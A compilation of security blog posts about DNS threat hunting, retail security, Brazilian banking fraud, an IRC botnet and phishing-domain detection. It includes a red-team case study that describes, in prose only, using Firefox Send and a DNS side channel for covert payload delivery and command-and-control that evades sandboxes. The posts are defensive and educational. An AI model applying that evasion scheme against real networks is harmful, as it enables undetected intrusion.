To protect the key assets of your enterprise and allocate sufficient resources to defend them, you must understand why a threat actor would be interested in attacking your organization. Attacker motivations can vary depending on the industry and geography of your enterprise, but the typical drivers are political and ideological differences, fame and recognition, and the opportunity to make money.

When it comes to DNS, bad actors have a vast arsenal of weapons they can utilize. Some of the most common methods of attack to anticipate are distributed denial-of-service (DDoS) attacks, DNS data exfiltration, cache poisoning and fast fluxing. As enterprises increase their security spending, cyberattacks become more innovative and sophisticated, including novel ways to abuse the DNS protocol. Malware continues to be the preferred method of threat actors, and domain generation algorithms (DGAs) are still widely used, but even that method has evolved to avoid detection.

2. Make DNS Monitoring a Habit

Passive DNS data is important because it is unlikely that a new network connection doesn’t have an associated DNS lookup. It also means that if you collect DNS data correctly, you can see most of the network activity in your environment. A more interesting subject is what we can do with this data to create more local security insights. Even though it is not hard to bypass DNS lookup, such network connections are suspicious and easy to detect.

3. Understand Communication and Traffic Patterns

Attackers leverage the DNS protocol in various ways — some of which are way ahead of our detection tools — however, there are always anomalies that we can observe in the DNS request sent out by endpoints. DNS traffic patterns vary by enterprise, so understanding what the normal pattern for your organization is will enable you to spot pattern anomalies easily.

A robust, secure system should be able to detect exfiltration via DNS tunneling software, which is not as easy as it sounds due to their different communication patterns. DNS tunneling software communication is reliable and frequent, the flow is bidirectional, and it is typically long. On the other hand, DNS exfiltration communication is opportunistic and unexpected, and possibly unidirectional since attackers are looking for the right moment to sneak out valuable data.

4. Get the Right Tools in Place

When analyzing which tools are the best to protect your organization against attacks leveraging DNS, consider what assets you want to protect and the outcomes you would like your analysts to achieve. There are many tools that can be pieced together to create a solution depending on your goals, such as firewalls, traffic analyzers and intrusion detection systems (IDSs).

To enhance the day-to-day activities of your security operations center (SOC), enable your team to conduct comprehensive analysis on domain activity and assign an appropriate risk rating, your SOC analysts should take advantage of threat intelligence feeds. These feeds empower analysts to understand the tactics, techniques and procedures (TTPs) of attackers and provide them with a list of malicious domains to block or alert on their security system. When this information is correlated with internal enterprise information through a security information and event management (SIEM) platform, analysts have full visibility to detect or anticipate ongoing attacks.

5. Be Proactive and Go Threat Hunting

Technology is a very useful tool that allows us to automate processes and alerts us of suspicious activity within our networks — but it is not perfect. Threat hunting can complement and strengthen your defense strategy by proactively searching for indicators of compromise (IoC) that traditional detection tools might miss. To succeed at threat hunting, you must define a baseline within your environment and then define the anomalies that you are going to look for.

A standard method for threat hunting is searching for unusual and unknown DNS requests, which can catch intruders that have already infiltrated your system as well as would-be intruders. Some indicators of abnormal DNS requests tinclude the number of NXDOMAIN records received by an endpoint, the number of queries an endpoint sends out and new query patterns. If you identify a potential threat, an incident response (IR) team can help resolve and remediate the situation by analyzing the data.

Learn More

Every organization is unique, but by understanding the basics of DNS analytics, the common methods of attack and the tools available to security teams, you will be better prepared to protect your enterprise from hidden cyberthreats.

We invite you to attend a live webinar at 11 a.m. ET on Dec. 11 (and available on-demand thereafter) to learn even more about DNS threat hunting.

Register for the webinar

The post 5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics appeared first on Security Intelligence.

Searching for Cisco Umbrella Alternatives? Your Affordable Option for DNS Security with Advanced Reporting.

Looking for an affordable alternative to Cisco Umbrella Enterprise's high cost? ThreatSTOP comes with advanced reporting and security research tools out-of-the-box. See blocked threats, remediate client machines faster and check IOC’s. Here's a breakdown of how ThreatSTOP and Cisco line up.

Spotlight: Operationalizing Deep Web and Dark Web Intelligence

In this episode of the podcast: Chris Camacho of Flashpoint joins us to talk about "the deep web" and "the dark web." Chris and I talk about how companies like Flashpoint monitor the dark web for intelligence and, then, how companies are able to operationalize that intelligence as part of their security and incident response programs.

The post ...

Read the whole entry... »

Related Stories

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users, and when files are sent through, its developers indicate it will generate “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Red Team Research

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows for large file sizes up to 1 GB, which is large enough an allowance to both send a payload and exfiltrate data. This answered our need for a siloed, covert channel into the organization. It would encrypt and decrypt the payload for us with an AES-GCM algorithm directly in the internet browser, yet we won’t have to deal with any key generation or distribution. The payload would evade the inspection of intercepting proxies that can unwrap Transport Layer Security (TLS), and would remain private and won’t be shared with any party along the way, including Mozilla.

Red Team Payload Delivery

Figure 2: Schematic view of FFSend’s automated encryption

Since is a trusted domain on most organizational controls, we gain yet another advantage by using FFSend. We won’t have to labor to set up a fake site that would raise suspicion, and we can still get our file’s link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as blacklists that organizations deploy to catch malicious content coming from rogue resources.

Red Team Research

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of times our FFSend link can be accessed after it’s generated, avoiding the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also featured on FFSend’s application program interface (API), so it can also be ordered ad hoc after a link is sent but before its default expiration.

Red Team Research

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Red Team Payload Delivery

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file sending issue resolved, we still needed a covert communication channel to help us establish an ongoing operation without being ousted by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we would have to choose a communication protocol that would allow us to look like everyone else on the network. Looking at the typical choices — Hyper Text Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and Domain Name System (DNS) protocols — we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS fit our need to implement a data channel to FFSend. Also, a command channel can offload to DNS. To make everything work together, DNS record content could be encrypted with the same FFSend shared key used to post the data link, keeping things consistent.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, to run or receive responses on. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent would then carry out the request and post the results over our FFSend data channel.

On the wire side, channel interaction will look like a well-formed dynamic DNS request, separate from an HTTPS channel used for data. This split would ensure avoiding traffic correlation.

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.

Listen to the X-Force Red in Action podcast series

The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Why Is the Retail Industry Still Lacking Security?

As another busy shopping season kicks into high gear, many of us will head to online retail sites and apps to check items off their holiday gift list. Security leaders should be mindful that if users do their shopping while at work, they are putting sensitive data — and possibly even the corporate network — at risk. That’s because retail industry sites and systems are too often poorly secured.

A recent survey from third-party risk management firm SecurityScorecard found that retail is among the lowest-ranked industries in terms of its security stance. The report looked at 1,444 domains in the industry with an IP footprint of at least 100 and found that retail had the second-lowest app security performance among major sectors, outperforming only the entertainment industry. What are retailers doing wrong?

Why Can’t Retailers Make the Grade?

“This year the retail industry’s security posture fell lower than in years past, both in application security and social engineering,” Fouad Khalil, head of compliance at SecurityScorecard, said in a press release. “To remain competitive, retailers are adopting new payment and digital technologies, exposing them as prime targets for cybercriminals.”

Despite the establishment of the Payment Card Industry Data Security Standard (PCI DSS) in 2004, SecurityScorecard found that many retailers are largely ignoring it. More than 90 percent of the retail domains analyzed indicated noncompliance with the regulation. Retailers in violation of PCI compliance face steep financial penalties if they are breached.

“As organizations assess their compliance with PCI DSS, they must be able to detect, remediate and recover from any threats or vulnerabilities adding risk to unauthorized access to CDE,” said Khalil in response to the findings.

Listen to the podcast: Examining the State of Retail Security

The Customer Experience Trumps Retail Security

Convenience and the user experience have always contributed to poor retail app security, noted Ron Schlecht, managing partner at cybersecurity consulting firm BTB Security.

“The focus is so much on how technology fills or creates business value, that security is oftentimes an afterthought,” he said. “The only true way to get ahead of this issue in this industry and to protect itself from an increasing level of sophistication in attacks is executive buy-in to the issue, as well as a cohesive security strategy at each organization to make this a priority.”

In an extremely competitive sales landscape, retailers still place precedence on what users want, and front-end ease of transaction wins over back-end retail app security. As a result, according to Mike Wilson, chief technology officer (CTO) of PasswordPing, merchants are reluctant to implement security measures that could get in the way of making a sale.

“Any ‘fraud-proof’ e-commence solution would need to include so many obstacles to block bad actors that real customers would find it practically impossible to complete a transaction,” said Wilson. “Many industries are able to apply security solutions that add some friction to their user experience in exchange for better security, but the retail industry knows that their consumers will go elsewhere if it’s not a seamless experience.”

Attackers Exploit Poor Security Awareness in Retail

Retailers have historically displayed little awareness about security. Despite numerous high-profile breaches over the years that have impacted major merchants, that dearth of understanding continues to cause problems.

The SecurityScorecard report noted that social engineering scams that target retailers are on the rise and ranked the industry last in security against such threats. As retail becomes increasingly digital, this trend could become even worse.

“The way we shop has changed drastically in the last few years,” said Migo Kedem, senior director of product at SentinelOne. “Retail is traditionally a low-tech business. The new technology brings new security challenges, and these ‘digital shoplifters’ can’t be simply scared away using security sensors. The current way of life requires a different security approach that can protect your assets from cyberthreats.”

Scott Swenka, an IT security specialist working for a large grocery chain, believes a lack of security-minded leadership is causing the industry to fall behind others when it comes to risk mitigation.

“They lag behind because most public retail organizations have boards that are built out of retailed-based leaders and simply do not have an understanding of technology and how it affects them,” he said.

How Can Retailers Catch Up?

While PCI does not appear to have improved security in retail, regulations that target point-of-sale (POS) systems have the potential to make a measurable impact in the future, said Jim Barkdoll, CEO at security vendor TITUS.

“Regulation will force the necessary cultural shift in how retailers approach security,” he predicted. “Even those that have had a breach tend to relax their focus on security practices after the public attention around their breach wanes, driving long-term security investments lower on their list of priorities. Regulation changes that and will force a continued and consistent adherence to security policies and practices.”

Security leaders at retail organizations can address this problem by practicing secure development and operations (DevSecOps) and monitoring emerging threats in the digital landscape. If developers build retail apps with security baked in from the beginning of the development process, retail systems will gradually become more secure from the ground up.

Data should be encrypted during system communication and storage, and apps should employ authentication between the app and its servers. Apps should also require customer authentication via factors such as one-time passwords (OTP) and biometrics.

As is the case in many industries, most retail organizations prioritize innovation and customer retention before security. But as consumers become more concerned about their own digital security and privacy, retailers must invest in new security technologies and practices and lean on industry experts to help build secure systems.

Listen to the podcast: Examining the State of Retail Security

The post Why Is the Retail Industry Still Lacking Security? appeared first on Security Intelligence.

Introducing Incident Handling & Response Professional (IHRP)

We are introducing the Incident Handling & Response Professional (IHRP) training course on December 11, 2018. Find out more and register for an exciting preview webinar.

No matter the strength of your company’s defense strategy, it is inevitable that security incidents will happen. Poor and/or delayed incident response has caused enormous damages and reputational harm to Yahoo, Uber, and most recently Facebook, to name a few. For this reason, Incident Response (IR) has become a crucial component of any IT Security department and knowing how to respond to such events is growing to be a more and more important skill.

Aspiring to switch to a career in Incident Response? Here’s how our new Incident Handling & Response Professional (IHRP) training course can help you learn the necessary skills and techniques for a successful career in this field.

Incident Handling & Response Professional (IHRP) 

The Incident Handling & Response Professional course (IHRP) is an online, self-paced training course that provides all the advanced knowledge and skills necessary to:

  • Professionally analyze, handle and respond to security incidents, on heterogeneous networks and assets
  • Understand the mechanics of modern cyber attacks and how to detect them
  • Effectively use and fine-tune open source IDS, log management and SIEM solutions
  • Detect and even (proactively) hunt for intrusions by analyzing traffic, flows and endpoints, as well as utilizing analytics and tactical threat intelligence

This training is the cornerstone of our blue teaming course catalog or, as we called it internally, “The PTP of Blue Team”.

Discover This Course & Get An Exclusive Offer

Take part in an exciting live demonstration and discover the complete syllabus of our latest course, Incident Handling & Response Professional (IHRP), on December 11. During this event, all the attendees will get their hands on an exclusive launch offer. Stay tuned! 😉

Be the first to know all about this modern blue teaming training course, join us on December 11.

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape

Financial cybercrime in Brazil is known as one of the most geospecific panoramas, where local cybercriminals attack local internet users. With close to 210 million residents in the country, criminals are in lavish turf. Some reports cite losses of nearly 70 billion Brazilian reals — which equates to about $18.6 billion — to fraud and online scams in 2017.

In following the evolution of cyber activity in Brazil, IBM Security sees this threat landscape as unique, where technical sophistication is neither the norm nor a requirement. In this first article of a two-part series, we expose some of our recent research on the typical malware and tactics, techniques and procedures (TTPs) used against Brazilian online banking users.

In contrast to rising sophistication in other parts of the globe, one of the most poignant characteristics of cybercrime in Brazil is its simplicity. Attackers will often use their familiarity with how local users browse the internet to take advantage of them and steal their money.

Internet Access Spreads Far and Wide in Brazil, But User Education Is Still Scarce

The majority of global internet users are located in East and South Asia, and China is the largest online market in the world. Fourth on the global chart, Brazil is the largest internet market in Latin America, with nearly 140 million internet users as of 2016, according to Statista.

Internet access has grown rapidly in Brazil in the past decade, with nearly 77 percent of residents accessing the internet from home in some of the more populated regions of the country.

Brazil malware landscape

Figure 1: A regional estimate of the percentage of homes with internet access in Brazil (Source: The Brazilian Institute of Geography and Statistics)

However, while more Brazilians than ever before have access to internet-enabled services, many users are still not well-versed in using them safely. Regardless of the browser or search engine, it’s not unusual for internet users to look up something they want to access and click the first result without thinking twice about it. When it comes to online banking, for example, some may not take the time to type their bank’s URL into the address bar and favor searching for it, then browsing to the top result they get back. Fraudsters rely on this behavior and serve up poisoned links as the top results on a search engine to trap those who are unaware of the risks.

When the Going Gets Tough…Become a Cybercriminal?

The drivers of crime in Brazil stem from socio-economic difficulty. In addition, laws are either nonexistent or not strict enough to deter people from becoming online thieves.

The minimum wage in Brazil stands at 969 reals (around $258) per month, as reported by The Rio Times. Brazilian Institute of Geography and Statistics (IBGE) data from 2017 shows that “more than 50 million Brazilians, nearly 25 percent of the population, live below the poverty line, and have family incomes of R$387.07 per month.”

Many Brazilians have never had it easy when it comes to their socio-economic situations. Since necessity is the mother of invention, that reality is also what makes Brazilians quite creative in problem solving. In many cases, the main problem for everyday people in Brazil is the lack of financial resources to sustain themselves and their families. That’s where creative thinking comes into play — sometimes in good ways and, unfortunately, sometimes in the shape of financial cybercrime.

Remote Overlay Malware Is the Way to Go

Financial threats targeting online banking users in Brazil are a rather monotonous bunch. Most code is based on overlay malware and written in the Delphi programming language — code that is neither elaborate nor modular. Why spend a chunk of money buying or building state-of-the-art malware, wrapping it up in end-to-end encryption and enabling it to gain rootkit privileges on devices, when you only need simple malware to trick users into unwittingly giving up their credentials?

With evolving controls that curb attackers’ ability to use phished credentials, using malware is the preferred method in Brazil, offering a better return on investment for less effort. But how are everyday fraudsters operating the malware supply chain without much technical savvy? That’s where creative thinking and being local come into play. It is also why so many fraudsters in Brazil use very similar malware codes that do mostly the same things — namely, remote overlay.

As its name suggests, remote overlay involves remotely plastering fake images and application interfaces on users’ screens to limit their access to an authenticated online banking session and trick them into divulging additional information. This type of malware is by far the most common used in Brazil nowadays, and threat actors have little reason to change it.

Brazilian Fraudsters Don’t Complicate Things When Easy Does It

Using malware is one thing, but first, it has to reach unsuspecting users. Without technical know-how, most Brazilian fraudsters do not operate exploit kits, which can be costly and often require technical support from cybercrime vendors. Recent attacks that our team analyzed show that most attackers prefer victims to come to them by putting a consumer spin on the watering hole attack tactic.

In Brazil, residents can download their monthly invoices and tax bills from the corresponding vendor’s website or government site. It is common practice for people to log in to an online utility account, for example, and download their bill. By setting up a malicious replica of such a site, criminals can attract a large number of users to that page and trick them into downloading a fake bill, thereby having them willingly fetch a Trojanized file and unknowingly launch the malware infection on their devices.

But without using an exploit kit or relying on high-traffic sites, how will that malicious infection zone become known to potential victims? Knowing that many people in Brazil are in the habit of searching for websites via search engines rather than typing their exact URL into the address bar, the obvious choice is to pay for a sponsored advertisement to have the malicious page top the search results. To keep their own identities out of sight, cybercriminals pay for sponsored ads with stolen credit card information, saving themselves both money and risk.

Posting malicious ads on popular search engines is no stroke of genius, but a surefire way to get those ads discovered by security controls and promptly taken down. Fraudsters using this tactic therefore rely on short, aggressive bouts of luring people to their phishing pages. Since they do not pay for the ads and can spin up a malicious page very quickly, they can still get enough clicks to make each attack worthwhile.

To further protect their malicious site for a long enough period to trap as many users as possible, fraudsters often use stolen payment cards to pay for legitimate services that optimize their site’s performance and mitigate the risk of a distributed denial-of-service (DDoS) attack.

Phising site in Brazil uses DDoS protection

Figure 2: Phishing site data on Virus Total

Malicious website public data

Figure 3: Phishing site uses DDoS protection

IBM X-Force noted that recent campaigns that spread malware using sponsored URLs were carefully targeted by focusing on a specific region on specific days. For example, these campaigns often impersonate a state’s power company around the due date of that month’s bill, exploiting the timely context for visitors trying to pay their invoice to infect victims with remote overlay Trojans.

As users attempt to download their invoices, they are actually accessing a ZIP file containing a shortcut file (.LNK) used by Microsoft Windows to point to an executable file. That file will then download additional malware components to infect the user’s device. Victims would only see a file that opens to nothing and may attempt to download the file again, which our researchers witnessed in many cases.

Need Help With Your Attack Campaign?

When it comes to financial cybercrime, technical sophistication, while not entirely absent, is not very common in the Brazilian threat landscape. In many cases, cybercriminals in the region are newcomers to the trade and need help to become familiar with the works of online fraud.

To fill in the gaps, these newcomers receive assistance from other criminals in the shape of tutorials, lessons, tools and wares to help them along — a marketplace that’s comparable to other dark web and underground forums across the globe.

In the images below, we can see that selling information and tools is a dynamic business in Brazil. Each of the following screen captures shows commodities offered to fraudsters, including compromised data, web resources and platforms to launch attacks, blackhat lead generation help, and cash-out services. The same types of vendors also offer malware for sale.

Brazil fraudster underground Brazilian fraudster service Brazilian fraud services Brazil fraud services

Figure 4: Cybercriminals often offer services and commodities to help other criminals along.

Dark web marketplaces spread knowledge and train more criminals on fraud tactics. Localized cybercrime ecosystems are more targeted, which boosts their efficiency and adverse effects.

A Word to the Wise: Top Tips for Safer Web Browsing

While it is easy for Brazilian users to get infected with malware, infections cannot occur without user interaction. This is in contrast to other parts of the world, where people can often get infected simply by visiting a compromised page through a drive-by download from an exploit kit, for example.

Below are some consumer tips for safer browsing, adapted to the popular infection scenarios in Brazil:

  • Don’t search for the homepage of important accounts. Poisoned search engine results can easily lead users to a malicious page. For important accounts, especially those involving payments, type the URL into the address bar or save the genuine website in the browser’s favorites list and access it from there.
  • Double-check the site before downloading files. Before clicking to download an invoice, double-check the domain and its credentials — a malicious site might be written with a spelling mistake or use a different top-level domain (TLD).
  • Make sure the site is secure. Since the update to Hypertext Transfer Protocol Secure (HTTPS), all websites feature encryption. Look for a lock icon in the address bar and click it to see that you are in the right place. Most popular web browsers will alert users to a site that is not secured, or worse, dangerous to visit. If that’s the case, close the page and contact the service provider directly to pay a bill.
  • Get genuine security software for your devices. Even though regular antivirus software can take longer to detect new banking malware, it can offer some protection against known threats, which are what hits users most often. Use and update an antivirus program on your home and mobile devices.
  • Keep your operating system (OS) and all applications up to date. Cybercriminals can take advantage of bugs and flaws in unpatched systems to compromise or infect them with malware. Apply patches and updates as soon as they become available to limit vulnerability.
  • Stay away from counterfeit software. All major software vendors have one, if not many, application security teams. Anyone offering up counterfeit software goes to great lengths to bypass the original vendor’s controls and, as a result, counterfeit applications are often weaker and open up backdoors to devices. Stay away from counterfeit applications and favor open source or freeware programs if you cannot afford to buy original software.
  • Last, but not least: education. One of the most important ways to help prevent malware infections and online banking fraud is user education. While security controls can help mitigate risks, they can’t replace user vigilance. Organizations and service providers alike should offer information that can help users become more aware of attack tactics and the risks associated with them.

Malware is prolific, but with the right risk management solution, you can prevent fraud while establishing digital identity trust throughout your customer’s online journey.

The post Easy Does It! A Timely Look Into Fraud TTPs in the Brazilian Financial Cybercrime Landscape appeared first on Security Intelligence.

Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are in a more sophisticated manner than ever before. Bad actors are ready to go the extra mile to get their hands on all types of organizations, industries, and information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
Top 10 Skills Every Purple Teamer Must Have
  1. Web Application Penetration Testing — It is the process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are becoming an increasing asset for businesses, but a threat at the same time. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing —  A compromised wifi puts an entire’s organization network at risk. WiFi penetration testing is a crucial skill for IT Security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test — from inside out, and focused on what attackers can get access to when successfully penetrating an organization’s environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass an information security device in order to ‘evade’ detection, or other defenses. Needless to say, it’s a red-teamer’s essential skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!

Click on the icons below to request your free demos:

Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.

Learn more about this offer, or click below to get started NOW.

Connect with us on Social Media

Twitter Facebook LinkedIn Instagram

Outlaw Threat Group Using Perl Shellbot to Target Enterprise IoT Devices

A cybercriminal group called Outlaw is using a Perl Shellbot to go after large organizations’ Internet of Things (IoT) devices.

The Trend Micro Cyber Safety Solutions Team observed a Perl Shellbot exploiting CVE-2017-1000117 to distribute an Internet Relay Chat (IRC) bot. This vulnerability enables attackers to pass a crafted “ssh://…” URL to unsuspecting victims and execute programs on their devices. According to Trend Micro, this threat can affect enterprise IoT devices, Linux servers, Windows-based environments and Android devices.

Outlaw communicates with the botnet using two compromised servers that belong to a Japanese art institution and a Bangladeshi government website. The threat group linked these two servers to a high-availability cluster to host an IRC bouncer and leveraged this asset for command-and-control (C&C) to target large businesses in more than a dozen countries, including the U.S., Germany, Israel and Japan.

The Ongoing Threat of IRC Botnets

IRC botnets are nothing new. In late 2016, MalwareMustDie observed attackers using new malware they called Linux/IRCTelnet to perform distributed denial-of-service (DDoS) attacks via an IRC botnet. More than a year later, Arbor Networks reported that attackers had used MedusaIRC and its IRC-based C&C to craft MedusaHTTP, an HTTP-based DDoS botnet written in .NET.

Unfortunately, it’s not difficult for cybercriminal groups like Outlaw to create this type of threat. Trend Micro observed that the code Outlaw used in its attacks is available online. Anyone can use that code to create a bot with an undetectable toolset.

How to Protect Enterprise IoT Devices From Outlaw

To protect their organizations against Outlaw’s activity, Trend Micro recommended monitoring for the creation of new accounts and restricting the use of FTP as much as possible. Security teams should also use reliable threat intelligence to block known malicious URLs and invest in security information and event management (SIEM) technology to identify unknown threats.

Sources: Trend Micro, MalwareMustDie, Arbor Networks

The post Outlaw Threat Group Using Perl Shellbot to Target Enterprise IoT Devices appeared first on Security Intelligence.

How to Stay One Step Ahead of Phishing Websites — Literally

Phishing scams are more advanced and widespread than ever, and threat actors are becoming increasingly sophisticated in their ability to craft malicious websites that look legitimate to unsuspecting users — including your employees, who have the kind of restricted access to enterprise data that cybercriminals covet most.

Traditionally, organizations have taken the blacklist approach: A security service provider rates domains based on reputation and a browser extension uses this data to block phishing websites. However, this approach can quickly devolve into a cat-and-mouse game, since the blacklist would only include domains that are actively hosting malicious content. In other words, this method isn’t effective until after victims are already infected.

Spot Phishing Scams Before They Cast Their Bait

IBM Research in Tokyo and IBM X-Force developed a more advanced approach to protecting users from malicious domains called ahead-of-threat detection. This unique method enables security teams to detect potentially malicious domains and actors before the actual threat becomes visible.

To demonstrate how to stay one step ahead of phishing websites with ahead-of-threat detection, let’s take a phishing site, for example. Figure 1 shows the typical life cycle of a malicious domain. In many cases, phishing domains are generated by replacing a single character in a popular domain with another similar-looking or easy-to-mistype character. Then there are domain generation alorithms, such as homograph domains and combosquatting and typosquatting domains.

Ahead-of-Threat Detection

Figure 1: Malicious domain life cycle

However they’re generated, bad actors register these domains to host phishing wesites. Ahead-of-threat detection can identify potentially malicious domains at the time of registration or at the very early stages of domain activation.

How Does Ahead-of-Threat Detection Identify Phishing Websites?

Ahead-of-threat detection pulls in numerous pools of data. One of the most important is the ICANN WHOIS database, which includes information about domain registrars, such as names, phone numbers and addresses. Although WHOIS is anonymized by a guard service that protects registrants’ more detailed personal information, it is one of the primary sources of data by which to evaluate a domain’s maliciousness via ahead-of-threat detection.

Another key metric is image comparison. Phishing sites nowadays tend to look nearly identical to legitimate websites. Therefore, if a domain hosts a site that looks similar to that of a bank or other service, ahead-of-threat detection will raise a red flag.

What Does Ahead-of-Threat Detection Look Like in Practice?

We deployed our architecture in the real world in the form of Quad9, a free service IBM launched in collaboration with Packet Clearing House (PCH) and the Global Cyber Alliance (GCA) to deliver greater online privacy and security protection to consumers and businesses. Quad 9 provides a stream of newly observed response tuples, or Unique DNS Record (UDR), that contains only the response domain, query type and response record. This stream of around 1 million UDR records per day is condensed from the Quad9 systems operating in 76 countries and 128 locations.

